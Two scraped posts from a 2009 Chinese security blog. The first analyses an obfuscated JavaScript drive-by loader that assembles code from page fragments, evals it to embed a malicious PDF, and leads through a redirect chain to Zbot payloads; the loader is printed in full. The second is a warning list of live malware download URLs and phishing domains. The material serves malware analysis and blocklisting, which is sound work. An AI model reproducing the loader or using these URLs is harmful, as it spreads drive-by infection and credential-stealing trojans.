id='WLdJwrKa2cZ'>setTimeout%28%22</REKzdPR3K3wq><b2oqDTeMLn64RO id='jdTPf7'>%20catch%28</b2oqDTeMLn64RO><AQNG2egusIY id='XzWwCTH'>0%20%2</AQNG2egusIY><PaD1eA id='uBTNKwbVU4i'>0A%20%20%20%7D%0A%</PaD1eA><Q9AJoUimaQEcrT id='HqPzolzUA44YEOms'>6C4MZwtl%28</Q9AJoUimaQEcrT><Wm5BI8FUaOqwzv id='K7sj8dW4OsgZ'>or.plugins.leng</Wm5BI8FUaOqwzv><uPjk7Ix id='tNV9pbEhLLL'>th%3B%20bz</uPjk7Ix><vZ24toa id='jjj70s'>%20%20%20%7D%0</vZ24toa><f35wpps id='heNM04yPzbBlz6'>f%28%2</f35wpps><jyCgIZgF id='JvBsa2WM'>29%0A%20%20%20%</jyCgIZgF><wGOEzh425h0g id='FTstOUA'>%20%20%20%20%20%20%2</wGOEzh425h0g><yE9dsl4I6dMYa8G id='GYbp6WmY'>EIGHT</yE9dsl4I6dMYa8G><BOB0C2oY5cG id='edxDLZpUblQm'>%20%20%20%7D%0A%20%2</BOB0C2oY5cG><xOtpHetakW id='Kzw7OcYvX8XNC4Ak'>%3D%2271%</xOtpHetakW><H0IJ16p id='qHUz3mrNXpFoc'>plugins%5BbzghM5e5r</H0IJ16p><ZsGnZKf id='yaVRL5GlIrKl'>UPD3ty%</ZsGnZKf><HbOBWmWblf id='DVNRBKujHBtM2'>%20%3D%20</HbOBWmWblf><vEAca4 id='VUJ8mKy7ttdNo83t'>0%20%20%20%20%20%2</vEAca4><p1UrBWe id='xqy7dQZnNAm'>20%20%20%2</p1UrBWe><zlOfsv36 id='GI85Y75VDS'>22%20TYPE%3D%22app</zlOfsv36><h8PBMewnkXTSx9 id='hNIDwLEx6obHQtEc'>BUxRh%29%0A%2</h8PBMewnkXTSx9><YCRRtAEW5pzYh id='c5UAkC3MYOjP'>indexOf%28%22Ado</YCRRtAEW5pzYh><pI6Un6WZxt8 id='LnDx15HtM'>RA4U%5D.na</pI6Un6WZxt8><wEK5tp id='TopfL4nixP'>%20%20</wEK5tp><jmCcBgS id='vYEryov'>0%20%20t</jmCcBgS><WUVLx5Im2Eyuoz id='cCC7dsE'>20%20%20%20</WUVLx5Im2Eyuoz><i4dQFlksjGInyA id='tt28ANb1u'>EMBED%2</i4dQFlksjGInyA><Eyz7YV id='kJdNXSZ0Bb4ZWX'>on%2Fpdf%22%20%</Eyz7YV><Os3EkpP7XD8Mucf id='HKQPJm'>0%20%20</Os3EkpP7XD8Mucf><X5Hal4oNUOCn id='v69YWVZqvoGj'>D%20fa</X5Hal4oNUOCn><WvbtWI5zfPwHv id='UyPbkYP5S'>20%20%20</WvbtWI5zfPwHv><EV34BT0MMa6TNahS id='zkmwlMdAJ6V'>C%20navigat</EV34BT0MMa6TNahS><Nh07rGLUqX id='V8L6fLn'>%0A%09%20%09docume</Nh07rGLUqX><Lync9Y10Xwg2 id='tFUdFvpQKDJ2A'>20%20%20%20%20%20%20</Lync9Y10Xwg2><UI41Kfhzg id='ro7nYfgmEcRZ'>0Mb7UBXTkBUxRh%20%3</UI41Kfhzg><xcGoSZxp id='vwPRg8'>3D%20-1%</xcGoSZxp><q7mIO8V373bxtm id='a5HMUjOolLf7M'>9%3B%</q7mIO8V373bxtm><VXWtW99PFhQ0a id='HBQlo2pic'>%3B%0A%20%20%20</VXWtW99PFhQ0a><PmOI9N49kLagnEE id='s53u332bY7qefzn'>FEMBED%3E%</PmOI9N49kLagnEE><JSKfQX5fQ6 id='xm7G1AM9cK9u1ZgP'>B%20bzghM5</JSKfQX5fQ6><FMHAfKOx6iR3QFg id='maisxMzgP4ZNBLDe'>%0Afunction%20Zxinm</FMHAfKOx6iR3QFg><NDwUYju id='q4jYC8KcxVQ5isr'>nt.write%28%27%3C</NDwUYju><Xjmdy1pZzHIE9q1 id='V4mEkF2Vqk97f5'>20%20%20%</Xjmdy1pZzHIE9q1><Vf2h6S0RM1KPF id='jNjZsDZvfLDrTB2b'>0%20var%2</Vf2h6S0RM1KPF><xRg3g6x id='orXlXFGBN'>navigat</xRg3g6x><aVKNzx8 id='rJ9MNyMvfpdmAR'>Acrobat%22%29%20%21%</aVKNzx8><TbzSiEqYlJ3 id='K5hDED'>20%20%</TbzSiEqYlJ3><UGoMnKGJT id='K0MJnW2XjcjANXB'>%20%20%20%20%20</UGoMnKGJT><d97BVR id='ri9NrtjRZWgn'>%20%20%20%20%20%</d97BVR><zTTgoj id='uMJW6Tucf8'>A%20%20%20%2</zTTgoj><KajonE id='aU4kyvw'>0%20%20%20%7B</KajonE><MvOWnRA id='gnOaIxKDDEFKO'>0SRC%3D%</MvOWnRA><DApXCt0b6fNbH0HQ id='JvRMkUVBc2Y5Dtzw'>true%3B%0A%20%2</DApXCt0b6fNbH0HQ><wdQ3dlaT id='c3m1jplkeapvpRh'>%20%20%20%7D%0A%20</wdQ3dlaT><N0d0OgFQ9xkWzJ9 id='kePr3wfU7uC3tl'>IDTH%3D%</N0d0OgFQ9xkWzJ9><DNGq7BuNlgQZ id='dD87u7nJCwsiRR'>lse%3B%0A%20</DNGq7BuNlgQZ><vJCHCLsH2GtIQAiU id='EjmpDI1qJZvXTuTe'>0%20%20%2</vJCHCLsH2GtIQAiU><sdQ1QQSLuqs3E6O id='a3RmHB9yA8'>20%20%20%2</sdQ1QQSLuqs3E6O><h5JYRfhV id='uaewLhaK'>0navigator.plu</h5JYRfhV><f1LYp01IRrRpO id='Zp5GEbliCj'>0%20%20%7B%0A%20%20</f1LYp01IRrRpO><wKO3YbGn id='khvzZeFsSE373R'>22pdf.php%22%20W</wKO3YbGn><JwJi9Fbrh3Q5IGAT id='VvxGiPUpV'>%20%2</JwJi9Fbrh3Q5IGAT><DmYh6VaSemx4S id='fxbzZphuB3n'>2B%2B%29%0A%</DmYh6VaSemx4S><AxTLEJA79SbX35E id='iHqR0RjprAcT8q'>0retu</AxTLEJA79SbX35E><znduaSTrTAPs6w id='liscLMNr9S2tg'>UPD3ty.</znduaSTrTAPs6w><vjN7Pvw id='KPqYfyVVqN'>20%7B%0A%20%20%20%20</vjN7Pvw><dJWlapkV id='tWK4tC'>%0A%20%20%20%2</dJWlapkV><W0I4bsaHgQ id='RuOWPC7bzUdZGxIP'>7D%0A%20</W0I4bsaHgQ><wZ4SxkiNsg9PfRX id='Q74uWvxTbRaVecPP'>2267%22%20H</wZ4SxkiNsg9PfRX><xvb6MvJfxTX id='NAaoRBcgf'>%20%20%20%20%20%20M</xvb6MvJfxTX><QkisOeE6FYz id='P8VFJGEOuGSr7'>gins%20%26%26%20</QkisOeE6FYz><HWEWkYgrg id='Ir5IiWR0GH2RuVYk'>rn%20fals</HWEWkYgrg><emtdAhkC id='AbKotkzcEt7Y2tsz'>0%20%20break</emtdAhkC></div></body><script type="text/javascript">var AlwI2Pi9NCYwE = new Array('maisxMzgP4ZNBLDe', 'HqPzolzUA44YEOms', 'LxKix9TwcezfD', 'TgyzXSIVm1SvTOX9', 'a3RmHB9yA8', 'jNjZsDZvfLDrTB2b', 'ro7nYfgmEcRZ', 'v69YWVZqvoGj', 'dD87u7nJCwsiRR', 'VvxGiPUpV', 'vYEryov', 'x7P1pXFQO', 'Gd5GGFxiw4', 'YMlF8FOqX', 'K5hDED', 'V4mEkF2Vqk97f5', 'PtNVgbGvdlmNus4y', 'heNM04yPzbBlz6', 'uaewLhaK', 'P8VFJGEOuGSr7', 'orXlXFGBN', 'CYp4qZlixQw', 'J8EmYvpE1mBYcFO', 'c8xqssgszuf', 'KPqYfyVVqN', 'zhnCgC7u', 'PhwzXKBGh', 'xSx1HgRmONlvh', 'xm7G1AM9cK9u1ZgP', 'LsRi8nV', 'zkmwlMdAJ6V', 'K7sj8dW4OsgZ', 'tNV9pbEhLLL', 'iN0BVO', 'fxbzZphuB3n', 'xqy7dQZnNAm', 'TJDUOi6r', 'aU4kyvw', 'tWK4tC', 'MKCf5gjoeel0', 'flmrMb', 'qkYpPDbZS7XV', 'yaVRL5GlIrKl', 'LqnV0hNo', 'qHUz3mrNXpFoc', 'LnDx15HtM', 'f0vPy5iH6n8EaKB', 'hiAucHhlD8jIp2N', 'FTstOUA', 'xdUlVm6AkDhu', 'liscLMNr9S2tg', 'c5UAkC3MYOjP', 'mi7Lo4KsXUckWzIv', 'rJ9MNyMvfpdmAR', 'vwPRg8', 'JvBsa2WM', 'cCC7dsE', 'BBBONshxYxdk0kO', 'tFUdFvpQKDJ2A', 'NAaoRBcgf', 'bHA5pAEM8vOL6y0', 'DVNRBKujHBtM2', 'JvRMkUVBc2Y5Dtzw', 'EjmpDI1qJZvXTuTe', 'VUJ8mKy7ttdNo83t', 'AbKotkzcEt7Y2tsz', 'HBQlo2pic', 'K0MJnW2XjcjANXB', 'jjj70s', 'uMJW6Tucf8', 'vH9j2EstvS', 'egUIMI3M', 'HKQPJm', 'wuheVrk8Hicc02', 'TopfL4nixP', 'edxDLZpUblQm', 'k2dHMiABen0r0i', 'jdTPf7', 'UVUaxlnb5poRTHq9', 'Zp5GEbliCj', 'c3m1jplkeapvpRh', 'famMRDCqpFdpyS', 'beBbHxClsn', 'hNIDwLEx6obHQtEc', 'XzWwCTH', 'PikMMg07EdZClDB', 'V8L6fLn', 'q4jYC8KcxVQ5isr', 'tt28ANb1u', 'gnOaIxKDDEFKO', 'khvzZeFsSE373R', 'kePr3wfU7uC3tl', 'Q74uWvxTbRaVecPP', 'GYbp6WmY', 'Kzw7OcYvX8XNC4Ak', 'GI85Y75VDS', 'XDpBci2uNvU8', 'kJdNXSZ0Bb4ZWX', 'IF6Z99', 's53u332bY7qefzn', 'xSILNLOO', 'ri9NrtjRZWgn', 'RuOWPC7bzUdZGxIP', 'tmbwEBqdhGpo', 'iHqR0RjprAcT8q', 'Ir5IiWR0GH2RuVYk', 'xTDBXSCPWU84', 'uBTNKwbVU4i', 'UyPbkYP5S', 'WLdJwrKa2cZ', 'R2q1QmI', 'a5HMUjOolLf7M', 'EOW87bPS');function RAgEl3Ov(AlwI2Pi9NCYwE, N6242SbW3G9zhh) {return e5izKHpBf2AvQXV=document.getElementById(AlwI2Pi9NCYwE[N6242SbW3G9zhh]).innerHTML;}var uPAM9AhP1 = AlwI2Pi9NCYwE.length; var PfcxRYGSyybLAA="";for (N6242SbW3G9zhh=0; uPAM9AhP1>N6242SbW3G9zhh; N6242SbW3G9zhh++ ) {var PfcxRYGSyybLAA=PfcxRYGSyybLAA+RAgEl3Ov(AlwI2Pi9NCYwE, N6242SbW3G9zhh);}eval(decodeURIComponent(PfcxRYGSyybLAA));</script></html>

好吧,一个世纪初的悲剧,这代码是什么?第一眼谁都看不懂,从上到下死盯着一分钟后保准不是你眼睛花了就是屏幕花了,其实结果是一样的,那我们发扬逆向思维的精神,从下面看,不难看出,还是个悲剧,变量名长的头晕,那没办法,谁让我写这个了,我就简化下他:

Level 3代码简化:
<script type="text/javascript">
var VarA = new Array('maisxMzgP4ZNBLDe', 'HqPzolzUA44YEOms', 'LxKix9TwcezfD', 'TgyzXSIVm1SvTOX9', 'a3RmHB9yA8', 'jNjZsDZvfLDrTB2b', 'ro7nYfgmEcRZ', 'v69YWVZqvoGj', 'dD87u7nJCwsiRR', 'VvxGiPUpV', 'vYEryov', 'x7P1pXFQO', 'Gd5GGFxiw4', 'YMlF8FOqX', 'K5hDED', 'V4mEkF2Vqk97f5', 'PtNVgbGvdlmNus4y', 'heNM04yPzbBlz6', 'uaewLhaK', 'P8VFJGEOuGSr7', 'orXlXFGBN', 'CYp4qZlixQw', 'J8EmYvpE1mBYcFO', 'c8xqssgszuf', 'KPqYfyVVqN', 'zhnCgC7u', 'PhwzXKBGh', 'xSx1HgRmONlvh', 'xm7G1AM9cK9u1ZgP', 'LsRi8nV', 'zkmwlMdAJ6V', 'K7sj8dW4OsgZ', 'tNV9pbEhLLL', 'iN0BVO', 'fxbzZphuB3n', 'xqy7dQZnNAm', 'TJDUOi6r', 'aU4kyvw', 'tWK4tC', 'MKCf5gjoeel0', 'flmrMb', 'qkYpPDbZS7XV', 'yaVRL5GlIrKl', 'LqnV0hNo', 'qHUz3mrNXpFoc', 'LnDx15HtM', 'f0vPy5iH6n8EaKB', 'hiAucHhlD8jIp2N', 'FTstOUA', 'xdUlVm6AkDhu', 'liscLMNr9S2tg', 'c5UAkC3MYOjP', 'mi7Lo4KsXUckWzIv', 'rJ9MNyMvfpdmAR', 'vwPRg8', 'JvBsa2WM', 'cCC7dsE', 'BBBONshxYxdk0kO', 'tFUdFvpQKDJ2A', 'NAaoRBcgf', 'bHA5pAEM8vOL6y0', 'DVNRBKujHBtM2', 'JvRMkUVBc2Y5Dtzw', 'EjmpDI1qJZvXTuTe', 'VUJ8mKy7ttdNo83t', 'AbKotkzcEt7Y2tsz', 'HBQlo2pic', 'K0MJnW2XjcjANXB', 'jjj70s', 'uMJW6Tucf8', 'vH9j2EstvS', 'egUIMI3M', 'HKQPJm', 'wuheVrk8Hicc02', 'TopfL4nixP', 'edxDLZpUblQm', 'k2dHMiABen0r0i', 'jdTPf7', 'UVUaxlnb5poRTHq9', 'Zp5GEbliCj', 'c3m1jplkeapvpRh', 'famMRDCqpFdpyS', 'beBbHxClsn', 'hNIDwLEx6obHQtEc', 'XzWwCTH', 'PikMMg07EdZClDB', 'V8L6fLn', 'q4jYC8KcxVQ5isr', 'tt28ANb1u', 'gnOaIxKDDEFKO', 'khvzZeFsSE373R', 'kePr3wfU7uC3tl', 'Q74uWvxTbRaVecPP', 'GYbp6WmY', 'Kzw7OcYvX8XNC4Ak', 'GI85Y75VDS', 'XDpBci2uNvU8', 'kJdNXSZ0Bb4ZWX', 'IF6Z99', 's53u332bY7qefzn', 'xSILNLOO', 'ri9NrtjRZWgn', 'RuOWPC7bzUdZGxIP', 'tmbwEBqdhGpo', 'iHqR0RjprAcT8q', 'Ir5IiWR0GH2RuVYk', 'xTDBXSCPWU84', 'uBTNKwbVU4i', 'UyPbkYP5S', 'WLdJwrKa2cZ', 'R2q1QmI', 'a5HMUjOolLf7M', 'EOW87bPS');
function FuncA(VarA, VarB) {VarC=document.getElementById(VarA[VarB]).innerHTML;return VarC}

var VarD = VarA.length;
var VarE="";
  for (VarB=0; VarD>VarB; VarB++ ) {
    VarE=VarE+FuncA(VarA, VarB);alert(VarE);}
   
   eval(decodeURIComponent(VarE));</script></html>

你把字体搞这么大干什么,有人问我,好不容易逮到机会骂下他作者我为什么不抓住呢,上面的代码最好不要执行,要执行你也得把他的alert(VarE);干掉再执行,为什么?因为那我加上去的,套在循环里面弹窗弹不死你……不过你会发现弹出来的都是空的,说明什么呢?代码加密很好?这个世界级难题的答案很简单,作者搞错了。

看代码不难看出,先是vara(下面不大小写错落有致的写了,太累)赋值成一大坨数据组成的数组,其实一看,各个元素就是上方网页元素的id。然后下面令varb自加1直到等于vard,期间vare不断加上从vara[varb]获取的对象数据,比如vara[varb]的内容是HBQlo2pic,那么他作者意愿就是获取<VXWtW99PFhQ0a id='HBQlo2pic'>%3B%0A%20%20%20</VXWtW99PFhQ0a>中的%3B%0A%20%20%20了,但是祸不单行,一是他代码执行出错,我们拿不到现成结果,二是我们只能自己一个个的拼凑了……说实话我懒得拼(我拼了前两个,是%0Afunction%20Zxinm6C4MZwtl%28,累死),不过看到有个元素是pdf.php,连上去,就是他了.


Level 4PDF:
pdf使用类似算法,可以解得http://ogzhnsltk.com/plugins/getexe.php(Trojan/Zbot),解密较容易,过程不赘述。

Level 5延伸:

延伸一下我们可以看到他的页面404是自定义的,404页面还是会加载恶意网址
Level 5>http://ogzhnsltk.com/plugins/load.php (404)
Level 6>http://rapidsystemsend.ru/transsend.html?888888f88678945fe (红色=随机数,如果是执行的话结果只有13万分之一的几率跟我的一样..)
Level 7>http://rapidsystemsend.ru/berikosmon.html
Level 8>http://yllowpagesnotstop.ru/pig/index.php
Level 9>http://yllowpagesnotstop.ru/pig/ipsumEvenLike.pdf
Level 9>http://yllowpagesnotstop.ru/pig/tookNormalFact.pdf
Level10>[TR.Zbot]http://yllowpagesnotstop.ru/pig/update.php?id=0

O收工:

可以看到,跟一个写的很烂的代码做抗争,先是要对其作者做出最深的BS,才有动力继续解密,第五篇结束!

By. Safelab.spaces.live.com

11:17 PM | Add a comment | Read comments (1) | Permalink | Blog it | 解密相关

2009.6.30 毒网预警(更新22+8个恶意域名)

恶意网站信息来源: 魔狼军团的博客[T 20-22]
恶意网站分析由: http://safelab.spaces.live.com

解密日期:2009-6-29
木马相关(Trojan/Malware Related)
网站
解密信息
1, xvideox.awardspace.biz
2, providensdue.com
[木马]
>http://xvideox.awardspace.biz/hDfikU6kldoUeD.html
>[TR.FakeCodec]http://providensdue.com/download/6d4c583271673d3de21fd4fc20090615/TestCodec.exe
3, e5t.7777tt.com
4, w8.7777ee.com
5, w2.7777ee.com
6, w1.7777ee.com
7, w3.7777ee.com
8, w9.7777ee.com
9, a1r.zhao123.info
[木马]
>[MT.List]http://e5t.7777tt.com/05/make.txt
>[TR.PSW]http://w8.7777ee.com/05/ok.exe
>http://w2.7777ee.com/s10.exe
>http://w1.7777ee.com/m01.exe
>http://w1.7777ee.com/m5.exe
>http://w3.7777ee.com/l1.exe
>http://w1.7777ee.com/m39.exe
>http://w2.7777ee.com/s2.exe
>http://w2.7777ee.com/s01.exe
>http://w2.7777ee.com/s1.exe
>http://w2.7777ee.com/s8.exe
>http://w1.7777ee.com/m23.exe
>http://w3.7777ee.com/l2.exe
>http://w1.7777ee.com/m37.exe
>http://w1.7777ee.com/m4.exe
>http://w2.7777ee.com/s17.exe
>http://w1.7777ee.com/m24.exe
>http://w3.7777ee.com/l3.exe
>http://w1.7777ee.com/m33.exe
>http://w1.7777ee.com/m15.exe
>http://w2.7777ee.com/s20.exe
>http://w2.7777ee.com/s15.exe
>http://w2.7777ee.com/s16.exe
>http://w2.7777ee.com/s14.exe
>http://w3.7777ee.com/l9.exe
>http://w3.7777ee.com/l5.exe
>http://w2.7777ee.com/s11.exe
>http://w3.7777ee.com/l8.exe
>http://w1.7777ee.com/m38.exe
>http://w2.7777ee.com/s12.exe
>http://w1.7777ee.com/m25.exe
>http://w1.7777ee.com/m02.exe
>http://w2.7777ee.com/s02.exe
>http://w2.7777ee.com/s21.exe
>http://w2.7777ee.com/s13.exe
>http://w3.7777ee.com/l7.exe
>http://w3.7777ee.com/l4.exe
>http://w3.7777ee.com/l6.exe
>http://w9.7777ee.com/a1.exe
>http://w9.7777ee.com/a2.exe
>http://w9.7777ee.com/a9.exe
>http://w9.7777ee.com/sb2.exe
>http://w9.7777ee.com/a8.exe
>http://w9.7777ee.com/a6.exe
>http://w9.7777ee.com/a10.exe
>http://a1r.zhao123.info/01/list.txt
10, gizliilimlerhazinesi.com
11, update.microsoft.com.kill1k.com
12, greenflor.cn
13, zlo-x.net
14, update.microsoft.com.ijlkij.com
15, update.microsoft.com.kiffil.com.mx
[木马]
>[TR.Zbot]http://gizliilimlerhazinesi.com/images/getexe.php
>http://update.microsoft.com.kill1k.com/microsoftofficeupdate/isapdl/default.aspx/index2.php
>[TR.Zbot]http://greenflor.cn/comedy/exe.php
>[TR.Zbot]http://zlo-x.net/test/getexe.php
>[TR.Zbot]http://zlo-x.net/d1ezorg/getexe.php
>http://update.microsoft.com.ijlkij.com/microsoftofficeupdate/isapdl/default.aspx?ln=en-us&id=4555663771763004659924501816749357333502688179511486095007020
>http://update.microsoft.com.kiffil.com.mx/microsoftofficeupdate/isapdl/default.aspx?ln=en-us&id=069725887396190003032080657151226705177238757170
>http://update.microsoft.com.kiffil.com.mx/microsoftofficeupdate/isapdl/default.aspx/?ln=en-us&id=069725887396190003032080657151226705177238757170
16, update.microsoft.com.kiffil.com.mx
17, ogzhnsltk.com
18, rapidsystemsend.ru
19, yllowpagesnotstop.ru
[木马]
>http://update.microsoft.com.kiffil.com.mx/microsoftofficeupdate/isapdl/default.aspx/?ln=en-us&id=069725887396190003032080657151226705177238757170
>http://ogzhnsltk.com/plugins/index.php
>http://ogzhnsltk.com/plugins/pdf.php
>[TR.Zbot]http://ogzhnsltk.com/plugins/getexe.php
>http://ogzhnsltk.com/plugins/load.php
>http://rapidsystemsend.ru/transsend.html?888888f88678945fe
>http://rapidsystemsend.ru/berikosmon.html
>http://yllowpagesnotstop.ru/pig/index.php
>http://yllowpagesnotstop.ru/pig/ipsumevenlike.pdf
>http://yllowpagesnotstop.ru/pig/tooknormalfact.pdf
>[TR.Zbot]http://yllowpagesnotstop.ru/pig/update.php?id=0
20, fucn.ch.ma
21, czmtv.net
22, mvt.be.ma
[木马]
关于:hxxp://rq-qjf.gov.cn/解密的日志(部分输出 -  16):
Level  1>http://fucn.ch.ma/js.js?google_ad=10x90_as
Level  2>http://www.czmtv.net/l/360.htm
Level  3>http://www.czmtv.net/l/x.htm
Level  4>http://www.czmtv.net/l/7.htm
Level  5>http://www.czmtv.net/l/7.css
Level  6>[TR.Downloader]http://mvt.be.ma/a.css
Level  4>http://www.czmtv.net/l/pp.htm
Level  4>http://www.czmtv.net/l/2.htm
Level  4>http://www.czmtv.net/l/cx.htm
Level  4>http://www.czmtv.net/l/bf.htm
Level  4>http://www.czmtv.net/l/s.htm
Level  4>http://www.czmtv.net/l/newlz.htm
Level  4>http://www.czmtv.net/l/office.htm
Level  4>http://www.czmtv.net/l/1.htm
Level  4>http://www.czmtv.net/l/all.css
Level  3>http://www.czmtv.net/l/iie.swf
日志由 Redoce1.9第72次修正版于 2009-6-29 22:24:30 生成。

解密日期:2009-6-29
钓鱼/虚假广告相关(Phishing/FakeAdwareRelated)
网站
钓鱼情况
1, imzudof.007webs.com
2, ralluram.007webs.com
3, mijonisoh.007webs.com
4, futlomaz.007webs.com
5, fikaxosod.007webs.com
6, mahulihav.007webs.com
7, wnfacuf.007webs.com
8, bigbrilliant.com
[欺骗]
>http://imzudof.007webs.com
>http://ralluram.007webs.com
>http://mijonisoh.007webs.com
>http://futlomaz.007webs.com
>http://fikaxosod.007webs.com
>http://mahulihav.007webs.com
>http://wnfacuf.007webs.com
>http://www.bigbrilliant.com/search.php?aid=77143&q=stuffed+fillet+of+sole+recipes

声明:
危险性:文中列于木马相关中的均为恶意木马站点,请勿直接点击(显示可执行文件的链接仅为病毒收集人员下载提供方便)。列于钓鱼相关中的网站为钓鱼站或是虚假的广告站点以及一些可能不符合法律规定的内容,一般情况下请不要相信这些网站的内容,也不要访问这些网站。
利用方式:所有链接仅供爱好者或安全研究人员做屏蔽、入库或上报安全软件厂商用,禁止一切非法的用途(包括复制,修改,无备注公布等一切传播行为)。
免责:您可以从此处提取站点进行屏蔽,但是我并不保证此处出现的一定为恶意站点,且不为可能出现的错误预警负任何责任,屏蔽一切站点前请复查。您可以从此处下载您需要的样本,但是本人不对因误执行样本等行为导致的任何直接损失或间接损失负责。
时效性:由于木马页面或钓鱼页面失效速度快,故可能部分网站经过一段时间会出现无法访问的情况。
10:26 PM | Add a comment | Permalink | Blog it | 毒网预警